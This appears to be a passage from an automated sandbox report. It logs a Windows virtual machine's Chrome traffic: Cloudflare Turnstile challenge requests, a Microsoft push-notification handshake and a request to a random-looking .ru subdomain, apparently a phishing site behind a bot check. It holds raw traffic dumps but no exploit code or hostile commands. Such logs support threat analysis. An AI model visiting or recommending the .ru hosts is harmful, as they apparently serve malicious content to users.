                                                                              Data Ascii: G6qnwv8Xy8PPWyfPE1fH0yvfx4LrR0cHF4QPF+A0GC8LmzwoH9gsY5dUS9fby7/HvFh0Z7P0bFwL3HB/2K+weHCQiCA8gJg4mBBsdKAwdFgHzDkUVL0A0CCE1TCAkRT8MEkhVUUcjUTZHWVsvHBpUNV04XFI2X0JfXSdWV0ZBSWZEbV5zKDUxQVJwPDdvO015Y016dHxQXWWLRodKYm5qamqRg2SQUnZhlmhlc5NbUpVeW1aAmKZxfaB5pqGur7
                                                                              2025-01-20 13:17:34 UTC1369INData Raw: 37 4e 6d 78 39 73 66 64 74 75 6e 75 36 72 76 50 36 2b 2f 57 77 67 4c 6e 36 4e 4d 4a 36 74 6f 4f 44 76 41 4a 44 77 34 4b 39 68 63 42 46 4e 49 50 43 52 54 73 37 42 30 57 39 41 38 63 47 67 2f 77 34 43 54 6a 2b 42 30 59 44 68 34 75 4a 79 6e 6b 4b 69 6e 75 4b 77 73 61 43 67 77 63 47 77 73 75 4c 52 38 31 51 69 30 6b 49 7a 6f 33 4e 43 63 36 4f 79 30 63 47 44 73 77 4c 77 38 2f 4e 44 4e 47 45 44 64 4e 54 6b 63 39 4b 31 5a 4a 50 31 55 62 55 45 4d 31 52 46 42 4a 4e 32 5a 4d 53 30 74 69 58 6c 41 2f 4c 31 78 67 56 45 42 6c 56 30 68 45 61 31 78 78 62 6d 31 66 64 32 42 6b 5a 46 4e 36 64 32 6c 58 52 32 31 74 58 46 68 34 66 47 2b 4f 66 33 52 6a 6a 6f 56 33 6a 5a 71 49 66 48 78 73 57 48 39 62 63 4a 43 44 67 32 4f 56 68 35 32 6d 6c 59 74 39 6a 4a 69 51 61 71 36 66 6b 36 71
                                                                              Data Ascii: 7Nmx9sfdtunu6rvP6+/WwgLn6NMJ6toODvAJDw4K9hcBFNIPCRTs7B0W9A8cGg/w4CTj+B0YDh4uJynkKinuKwsaCgwcGwsuLR81Qi0kIzo3NCc6Oy0cGDswLw8/NDNGEDdNTkc9K1ZJP1UbUEM1RFBJN2ZMS0tiXlA/L1xgVEBlV0hEa1xxbm1fd2BkZFN6d2lXR21tXFh4fG+Of3RjjoV3jZqIfHxsWH9bcJCDg2OVh52mlYt9jJiQaq6fk6q


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              28192.168.2.649875104.18.94.414436468C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-20 13:17:35 UTC598OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/605860113:1737375097:AQtvdO2D1SMmkKmXHkUChIKLql2iCbTUUA-etS4QEUs/904f584ecef78c84/B7Z8_lZ1T490Z7ARD1SXfwmkxORwX0fuNibw7ixEi_o-1737379048-1.1.1.1-ksG.xkH.RsP6BvwjXLQHitp0UvG1mUMGZ.J0x1qPXVnRcS5LzaGrbFibeq1E6azf HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2025-01-20 13:17:35 UTC442INHTTP/1.1 400 Bad Request
                                                                              Date: Mon, 20 Jan 2025 13:17:35 GMT
                                                                              Content-Type: application/json
                                                                              Content-Length: 14
                                                                              Connection: close
                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              cf-chl-out: fv72t15KCMRFu2WEtIsV/KN94odQCf9T5fwC0t17oGK0dP01kVxyILcV0kZ66rB/ziA+LIsWc+bDaChsq63uOQ==$TqdV1KulcwI1rmhg7kO2CQ==
                                                                              Server: cloudflare
                                                                              CF-RAY: 904f5876bbf3f791-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2025-01-20 13:17:35 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 30 30 32 33 30 7d
                                                                              Data Ascii: {"err":100230}


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              29192.168.2.64989640.113.110.67443
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-20 13:17:38 UTC70OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 34 0d 0a 4d 53 2d 43 56 3a 20 44 33 33 44 76 6f 39 53 78 45 32 77 53 6f 37 4a 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 31 36 38 66 36 30 37 32 32 64 32 36 31 65 0d 0a 0d 0a
                                                                              Data Ascii: CNT 1 CON 304MS-CV: D33Dvo9SxE2wSo7J.1Context: 1168f60722d261e
                                                                              2025-01-20 13:17:38 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                              Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                              2025-01-20 13:17:38 UTC1083OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 30 0d 0a 4d 53 2d 43 56 3a 20 44 33 33 44 76 6f 39 53 78 45 32 77 53 6f 37 4a 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 31 36 38 66 36 30 37 32 32 64 32 36 31 65 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 68 53 5a 7a 46 39 48 51 53 69 41 5a 75 45 6a 45 4c 48 38 44 48 74 69 76 42 5a 55 4f 66 6c 61 2b 2f 6a 6f 6e 43 76 61 77 43 76 4e 62 4e 76 7a 72 4b 33 56 70 2f 7a 6c 7a 41 43 58 78 44 48 4f 63 50 2f 68 4b 6a 73 30 39 32 65 54 62 37 53 79 53 30 71 51 56 53 38 43 78 52 75 66 74 5a 4e 36 78 76 30 5a 4a 31 63 43 39 44 33 72 6c 36
                                                                              Data Ascii: ATH 2 CON\DEVICE 1060MS-CV: D33Dvo9SxE2wSo7J.2Context: 1168f60722d261e<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAXhSZzF9HQSiAZuEjELH8DHtivBZUOfla+/jonCvawCvNbNvzrK3Vp/zlzACXxDHOcP/hKjs092eTb7SyS0qQVS8CxRuftZN6xv0ZJ1cC9D3rl6
                                                                              2025-01-20 13:17:38 UTC217OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 36 0d 0a 4d 53 2d 43 56 3a 20 44 33 33 44 76 6f 39 53 78 45 32 77 53 6f 37 4a 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 31 36 38 66 36 30 37 32 32 64 32 36 31 65 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                              Data Ascii: BND 3 CON\WNS 0 196MS-CV: D33Dvo9SxE2wSo7J.3Context: 1168f60722d261e<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                              2025-01-20 13:17:38 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                              Data Ascii: 202 1 CON 58
                                                                              2025-01-20 13:17:38 UTC58INData Raw: 4d 53 2d 43 56 3a 20 56 72 59 54 32 41 4e 66 68 6b 4f 58 34 54 66 34 45 32 72 74 53 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                              Data Ascii: MS-CV: VrYT2ANfhkOX4Tf4E2rtSg.0Payload parsing failed.


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              30192.168.2.649907104.18.95.414436468C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-20 13:17:40 UTC1175OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/605860113:1737375097:AQtvdO2D1SMmkKmXHkUChIKLql2iCbTUUA-etS4QEUs/904f584ecef78c84/B7Z8_lZ1T490Z7ARD1SXfwmkxORwX0fuNibw7ixEi_o-1737379048-1.1.1.1-ksG.xkH.RsP6BvwjXLQHitp0UvG1mUMGZ.J0x1qPXVnRcS5LzaGrbFibeq1E6azf HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              Content-Length: 35424
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              Content-type: application/x-www-form-urlencoded
                                                                              CF-Chl-RetryAttempt: 0
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              CF-Challenge: B7Z8_lZ1T490Z7ARD1SXfwmkxORwX0fuNibw7ixEi_o-1737379048-1.1.1.1-ksG.xkH.RsP6BvwjXLQHitp0UvG1mUMGZ.J0x1qPXVnRcS5LzaGrbFibeq1E6azf
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Origin: https://challenges.cloudflare.com
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/1oqzy/0x4AAAAAAA1l_zHcax2l-m1D/auto/fbE/new/normal/auto/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2025-01-20 13:17:40 UTC16384OUTData Raw: 76 5f 39 30 34 66 35 38 34 65 63 65 66 37 38 63 38 34 3d 67 74 59 46 25 32 62 6a 41 4b 31 71 74 32 74 4c 56 79 77 79 4f 79 37 4a 4c 4b 79 32 41 24 79 73 46 33 58 79 4b 79 55 46 71 38 73 79 57 79 31 46 36 58 6a 6a 79 63 46 36 59 79 4d 34 2d 79 64 6a 79 2d 72 46 79 6c 30 79 4c 4b 44 56 4c 79 4c 6b 79 70 46 71 4b 39 59 79 2d 58 41 67 79 48 31 79 34 58 70 5a 56 41 2d 79 4c 38 45 79 57 35 48 66 74 55 62 79 2d 48 4c 4d 79 38 72 2d 35 58 57 65 78 4f 55 79 58 46 2d 75 37 35 45 6a 79 79 44 47 79 67 66 48 47 35 45 24 79 6a 4e 57 6b 46 6a 4d 43 35 4e 42 79 4c 74 79 45 70 4c 79 4f 49 4a 53 44 50 4c 31 47 70 71 24 43 48 78 65 44 56 63 63 76 79 31 48 79 41 54 65 24 67 66 24 47 35 47 57 4e 32 72 65 47 64 5a 6b 69 4b 4d 6c 42 70 68 6e 47 56 54 34 2b 4b 55 4a 53 6e 33 41
                                                                              Data Ascii: v_904f584ecef78c84=gtYF%2bjAK1qt2tLVywyOy7JLKy2A$ysF3XyKyUFq8syWy1F6XjjycF6YyM4-ydjy-rFyl0yLKDVLyLkypFqK9Yy-XAgyH1y4XpZVA-yL8EyW5HftUby-HLMy8r-5XWexOUyXF-u75EjyyDGygfHG5E$yjNWkFjMC5NByLtyEpLyOIJSDPL1Gpq$CHxeDVccvy1HyATe$gf$G5GWN2reGdZkiKMlBphnGVT4+KUJSn3A
                                                                              2025-01-20 13:17:40 UTC16384OUTData Raw: 47 46 33 4e 4a 79 2d 6a 41 64 46 41 46 43 79 48 77 71 30 53 65 59 70 79 61 62 63 62 63 75 79 31 79 4d 79 4c 72 41 47 79 44 72 6a 73 41 57 79 67 6d 53 59 41 42 79 79 79 6a 34 66 79 4a 73 71 59 79 56 79 6e 70 4c 59 41 66 79 4f 72 41 74 79 54 41 4c 72 78 79 2d 70 79 43 6d 71 47 41 34 79 33 73 41 79 79 76 79 50 72 4a 55 79 2b 79 48 79 71 59 41 4b 79 6a 73 6a 57 79 6f 79 41 73 78 74 79 74 46 4f 79 79 42 41 67 6d 68 65 41 79 79 70 79 78 73 71 5a 79 73 79 6d 4b 4a 55 41 70 73 6d 4b 6a 31 41 76 79 68 72 71 42 79 73 79 36 46 36 37 61 65 79 4f 46 41 58 6a 35 79 78 65 71 42 41 4b 79 44 46 32 59 41 77 79 78 33 7a 72 69 35 79 51 72 41 6b 79 54 31 78 4b 71 55 79 73 79 68 72 4a 4c 2d 32 79 2b 46 32 58 6a 66 79 4a 72 59 33 69 57 48 58 46 4c 74 2d 77 79 38 4e 41 79 41 79
                                                                              Data Ascii: GF3NJy-jAdFAFCyHwq0SeYpyabcbcuy1yMyLrAGyDrjsAWygmSYAByyyj4fyJsqYyVynpLYAfyOrAtyTALrxy-pyCmqGA4y3sAyyvyPrJUy+yHyqYAKyjsjWyoyAsxtytFOyyBAgmheAyypyxsqZysymKJUApsmKj1AvyhrqBysy6F67aeyOFAXj5yxeqBAKyDF2YAwyx3zri5yQrAkyT1xKqUysyhrJL-2y+F2XjfyJrY3iWHXFLt-wy8NAyAy
                                                                              2025-01-20 13:17:40 UTC2656OUTData Raw: 70 79 30 7a 32 5a 6a 6c 79 6d 4c 31 78 4d 42 4e 66 6e 76 72 66 2d 79 58 71 38 46 41 66 43 2b 46 6a 65 48 55 79 50 79 71 46 6d 41 79 58 72 6a 69 42 69 45 74 46 4a 76 41 51 24 74 24 50 47 7a 65 79 47 50 7a 5a 77 45 74 32 46 41 58 41 6a 79 4b 2d 30 31 66 66 70 49 59 71 72 37 6e 6f 58 64 41 68 65 55 48 35 72 4c 58 7a 56 59 46 65 41 70 79 4c 79 48 6a 32 73 41 6c 46 68 36 71 54 2b 6d 44 77 72 4c 5a 6d 76 73 43 58 71 4d 41 67 45 41 78 4f 74 59 6f 4d 6f 72 78 73 41 70 6d 75 24 6f 4c 24 58 79 6d 4b 79 58 79 46 48 57 79 4a 4f 77 34 79 71 79 6a 47 79 78 71 54 4b 67 37 63 4b 79 4d 30 4b 4d 7a 73 6f 6f 58 68 42 51 41 37 24 73 78 44 41 31 42 2b 55 41 46 41 54 79 32 59 2d 72 69 49 6c 68 79 2d 6b 6d 73 79 4d 73 41 32 79 76 59 57 79 79 42 79 65 30 65 75 66 2d 24 31 6d 75
                                                                              Data Ascii: py0z2ZjlymL1xMBNfnvrf-yXq8FAfC+FjeHUyPyqFmAyXrjiBiEtFJvAQ$t$PGzeyGPzZwEt2FAXAjyK-01ffpIYqr7noXdAheUH5rLXzVYFeApyLyHj2sAlFh6qT+mDwrLZmvsCXqMAgEAxOtYoMorxsApmu$oL$XymKyXyFHWyJOw4yqyjGyxqTKg7cKyM0KMzsooXhBQA7$sxDA1B+UAFATy2Y-riIlhy-kmsyMsA2yvYWyyBye0euf-$1mu
                                                                              2025-01-20 13:17:40 UTC282INHTTP/1.1 200 OK
                                                                              Date: Mon, 20 Jan 2025 13:17:40 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 4848
                                                                              Connection: close
                                                                              cf-chl-out: nm9CSIZaZ/SVzwwrszXOjK/tNVGOEHyfYxjRcB47uwWJlabWZ1pjEgCt6ryuTyqCpxviNdwva+J2dYI8fsj5Uwtr4EXeX5e2ohdpn6PmOE4=$cT7Hf1H6R2KctCOU+7Ze7w==
                                                                              2025-01-20 13:17:40 UTC1191INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 2d 73 3a 20 58 49 65 30 31 4f 42 48 4c 6a 6b 56 63 33 6d 6d 30 34 76 4f 70 76 77 4d 64 76 67 45 2f 75 5a 6e 75 34 74 2b 6d 2f 39 6a 4a 37 6f 43 39 39 69 42 54 4b 61 58 52 32 32 7a 42 37 42 77 52 42 76 77 71 6c 46 6e 57 42 58 62 75 7a 6b 79 6d 33 6f 78 72 77 37 44 57 6a 52 37 56 66 4a 43 4a 78 31 58 58 70 56 58 32 68 61 55 4b 4b 4d 66 30 64 2b 73 35 64 6a 71 72 70 30 70 73 76 38 62 73 75 6f 50 52 70 51 52 2b 4f 65 34 35 74 6a 47 68 48 54 62 58 65 4e 6f 55 49 77 55 5a 61 79 6a 4d 70 72 43 70 30 66 76 67 37 36 36 52 78 43 48 6c 5a 79 63 70 78 72 76 61 4b 67 67 6e 4d 4c 44 42 5a 6f 63 57 30 72 51 37 42 64 47 54 52 66 63 2b 57 67 58 34 49 50 5a 33 6f 6f 44 4d 2b 39 4b 74 75 51 56 65 38 71 45 73 64 33 4b 31 58 54 76 4c 53 4e 64 6c
                                                                              Data Ascii: cf-chl-out-s: XIe01OBHLjkVc3mm04vOpvwMdvgE/uZnu4t+m/9jJ7oC99iBTKaXR22zB7BwRBvwqlFnWBXbuzkym3oxrw7DWjR7VfJCJx1XXpVX2haUKKMf0d+s5djqrp0psv8bsuoPRpQR+Oe45tjGhHTbXeNoUIwUZayjMprCp0fvg766RxCHlZycpxrvaKggnMLDBZocW0rQ7BdGTRfc+WgX4IPZ3ooDM+9KtuQVe8qEsd3K1XTvLSNdl
                                                                              2025-01-20 13:17:40 UTC1265INData Raw: 6f 6f 43 7a 67 70 61 53 74 70 61 68 70 63 61 55 70 35 36 39 78 4b 4b 6c 77 38 76 48 7a 37 47 77 78 4a 54 49 73 4e 33 66 74 35 61 38 30 35 75 32 77 63 48 69 6f 38 58 64 78 61 57 6e 72 73 62 4f 71 37 4c 4b 78 50 62 4c 72 63 2f 33 7a 74 50 4c 38 76 58 35 76 64 50 4d 34 2b 33 54 7a 2f 30 43 30 76 6b 4a 41 2b 58 61 36 66 44 4a 35 63 58 53 46 51 44 53 39 78 54 73 46 2f 6a 73 36 65 63 4a 38 50 77 69 48 64 37 30 33 39 38 64 33 41 50 6b 36 51 4d 4c 4b 4f 38 67 45 7a 4c 78 49 78 41 75 4b 50 51 33 48 67 6b 39 43 42 55 4d 51 78 63 43 45 51 39 4a 2b 76 73 69 52 52 30 73 51 79 6b 4d 44 6b 41 39 53 42 42 55 4d 44 41 61 55 46 6b 71 55 44 45 64 53 7a 6f 36 58 6c 6f 59 51 42 35 69 4b 69 4e 59 62 57 6c 76 4c 79 68 76 61 58 46 48 59 32 73 77 53 6e 49 79 65 58 31 72 50 6b 35
                                                                              Data Ascii: ooCzgpaStpahpcaUp569xKKlw8vHz7GwxJTIsN3ft5a805u2wcHio8XdxaWnrsbOq7LKxPbLrc/3ztPL8vX5vdPM4+3Tz/0C0vkJA+Xa6fDJ5cXSFQDS9xTsF/js6ecJ8PwiHd70398d3APk6QMLKO8gEzLxIxAuKPQ3Hgk9CBUMQxcCEQ9J+vsiRR0sQykMDkA9SBBUMDAaUFkqUDEdSzo6XloYQB5iKiNYbWlvLyhvaXFHY2swSnIyeX1rPk5
                                                                              2025-01-20 13:17:40 UTC1369INData Raw: 31 6f 34 52 58 4d 34 4e 31 35 37 51 47 39 75 64 31 64 2f 67 56 39 79 51 30 65 41 68 55 68 65 68 49 68 37 58 34 31 55 63 48 4f 4e 65 35 64 57 6b 32 74 74 69 48 78 78 6d 35 2b 42 6e 59 47 57 6f 49 65 4a 65 70 36 6b 6d 32 71 72 68 59 57 52 72 35 4f 4e 68 72 4b 62 6b 59 57 32 6e 34 33 42 6e 72 57 72 6d 62 79 6c 67 4c 6d 34 71 62 71 4a 71 62 62 4c 79 38 61 6b 6f 4b 37 44 79 35 4f 7a 30 37 65 6f 75 62 69 2f 79 72 6e 51 6e 4e 75 65 32 63 36 6b 73 4e 76 48 31 38 72 5a 79 37 6e 6a 7a 63 58 55 30 2b 48 70 78 37 54 6e 34 74 48 32 38 74 48 71 32 66 50 66 7a 66 44 33 35 74 48 6b 35 73 53 39 39 50 6e 65 44 38 77 46 2b 75 48 78 43 75 6e 68 42 68 54 35 44 50 51 52 46 66 30 43 46 39 33 62 41 51 50 64 34 42 67 68 35 68 73 4b 43 76 34 77 2b 69 59 50 37 43 51 6b 43 51 49 42
                                                                              Data Ascii: 1o4RXM4N157QG9ud1d/gV9yQ0eAhUhehIh7X41UcHONe5dWk2ttiHxxm5+BnYGWoIeJep6km2qrhYWRr5ONhrKbkYW2n43BnrWrmbylgLm4qbqJqbbLy8akoK7Dy5Oz07eoubi/yrnQnNue2c6ksNvH18rZy7njzcXU0+Hpx7Tn4tH28tHq2fPfzfD35tHk5sS99PneD8wF+uHxCunhBhT5DPQRFf0CF93bAQPd4Bgh5hsKCv4w+iYP7CQkCQIB
                                                                              2025-01-20 13:17:40 UTC1369INData Raw: 68 56 56 48 39 62 62 6d 5a 41 52 6e 31 32 64 31 35 74 54 48 70 70 57 6d 36 4e 55 49 79 51 6d 49 43 5a 62 5a 68 6b 61 46 56 63 6a 46 71 64 6a 4a 69 4e 68 31 6c 6f 6c 31 78 70 65 33 6c 6b 6a 5a 2b 61 61 6d 78 39 62 72 43 4f 68 33 57 36 75 72 52 38 74 36 42 39 75 62 4b 66 6d 4b 57 66 68 36 4c 41 6d 5a 53 4c 75 63 76 43 6b 4b 57 63 78 49 71 65 77 4b 65 75 79 73 57 31 76 5a 6d 5a 31 74 33 56 72 37 7a 57 34 38 62 47 74 4f 58 46 77 35 37 46 79 73 44 41 78 38 33 75 76 63 7a 43 74 72 50 6e 78 62 66 4a 31 4d 72 4d 79 64 66 4f 31 38 48 62 33 65 51 47 35 50 49 44 32 67 76 4d 34 67 73 41 38 50 45 57 37 41 58 54 39 66 45 54 2b 75 6b 62 47 42 6b 57 32 52 7a 5a 4a 43 50 6c 2b 76 45 6f 36 76 34 61 4c 42 38 6a 4c 79 6b 6d 48 79 7a 39 4e 75 30 48 42 6a 45 52 37 68 33 30 4d
                                                                              Data Ascii: hVVH9bbmZARn12d15tTHppWm6NUIyQmICZbZhkaFVcjFqdjJiNh1lol1xpe3lkjZ+aamx9brCOh3W6urR8t6B9ubKfmKWfh6LAmZSLucvCkKWcxIqewKeuysW1vZmZ1t3Vr7zW48bGtOXFw57FysDAx83uvczCtrPnxbfJ1MrMydfO18Hb3eQG5PID2gvM4gsA8PEW7AXT9fET+ukbGBkW2RzZJCPl+vEo6v4aLB8jLykmHyz9Nu0HBjER7h30M
                                                                              2025-01-20 13:17:40 UTC845INData Raw: 79 68 6d 42 37 52 48 52 33 58 49 4a 59 62 56 35 51 67 49 79 4a 67 6e 4a 34 56 6c 4a 58 6c 35 56 59 6a 59 6c 5a 57 34 4e 38 6d 58 69 51 67 32 53 58 6d 59 74 6f 65 4a 43 53 70 4a 31 77 6a 32 32 41 6d 4b 32 72 62 61 53 5a 64 61 31 32 71 37 6c 31 73 4b 4b 69 73 72 43 6e 6c 36 79 6f 72 4a 6e 4b 6e 62 71 76 30 72 2b 76 70 39 61 78 75 70 48 62 33 4c 65 76 7a 72 61 2b 72 73 2f 5a 7a 63 48 61 36 63 4f 6a 35 61 7a 6e 34 39 72 6f 35 65 66 54 72 39 37 6e 72 2f 62 54 36 2b 72 7a 32 38 72 37 34 4f 6d 36 39 62 72 67 30 2f 4c 5a 35 76 7a 49 37 4f 58 62 7a 50 7a 36 34 66 34 49 43 38 34 44 39 2f 54 70 39 4f 6f 47 2b 64 37 57 2b 2b 37 66 48 2f 37 67 2b 41 67 49 43 65 67 4f 46 77 72 68 4d 52 41 30 4c 2f 77 50 4c 42 6a 71 4a 44 41 57 4d 6a 67 77 41 42 30 71 4f 43 55 38 4d 43
                                                                              Data Ascii: yhmB7RHR3XIJYbV5QgIyJgnJ4VlJXl5VYjYlZW4N8mXiQg2SXmYtoeJCSpJ1wj22AmK2rbaSZda12q7l1sKKisrCnl6yorJnKnbqv0r+vp9axupHb3Levzra+rs/ZzcHa6cOj5azn49ro5efTr97nr/bT6+rz28r74Om69brg0/LZ5vzI7OXbzPz64f4IC84D9/Tp9OoG+d7W++7fH/7g+AgICegOFwrhMRA0L/wPLBjqJDAWMjgwAB0qOCU8MC


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              31192.168.2.649913104.18.94.414436468C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-20 13:17:40 UTC598OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/605860113:1737375097:AQtvdO2D1SMmkKmXHkUChIKLql2iCbTUUA-etS4QEUs/904f584ecef78c84/B7Z8_lZ1T490Z7ARD1SXfwmkxORwX0fuNibw7ixEi_o-1737379048-1.1.1.1-ksG.xkH.RsP6BvwjXLQHitp0UvG1mUMGZ.J0x1qPXVnRcS5LzaGrbFibeq1E6azf HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2025-01-20 13:17:40 UTC442INHTTP/1.1 400 Bad Request
                                                                              Date: Mon, 20 Jan 2025 13:17:40 GMT
                                                                              Content-Type: application/json
                                                                              Content-Length: 14
                                                                              Connection: close
                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              cf-chl-out: Ll6/Z6B67/xgiPhmKOjRFW8q8GS0q3Ub9OHDwNB/xiRC9N+TiKQrAkNa/VwWhOxH3V4oGZah0ITgOYbIUfMptQ==$sLZXDMwI0tv5JOCy/RULxQ==
                                                                              Server: cloudflare
                                                                              CF-RAY: 904f589a28908ca1-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2025-01-20 13:17:40 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 30 30 32 33 30 7d
                                                                              Data Ascii: {"err":100230}


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              32192.168.2.649920172.67.169.1974436468C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-20 13:17:41 UTC675OUTGET /dtcfafzhwhbirleqzDLxHVTpKrHALYIVUMFBINZGSUUULWLEGTEAEFQVIEXDSLXWNQQCPJZUMVLDF HTTP/1.1
                                                                              Host: pjg7rj2rbflmg2afmlvnhwuzrlb9bbturgzumukxwolcl9nb8ttspiii.dbetarlp.ru
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Origin: https://hbv.julfolusi.ru
                                                                              Sec-Fetch-Site: cross-site
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Referer: https://hbv.julfolusi.ru/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2025-01-20 13:17:41 UTC899INHTTP/1.1 200 OK
                                                                              Date: Mon, 20 Jan 2025 13:17:41 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Access-Control-Allow-Origin: *
                                                                              cf-cache-status: DYNAMIC
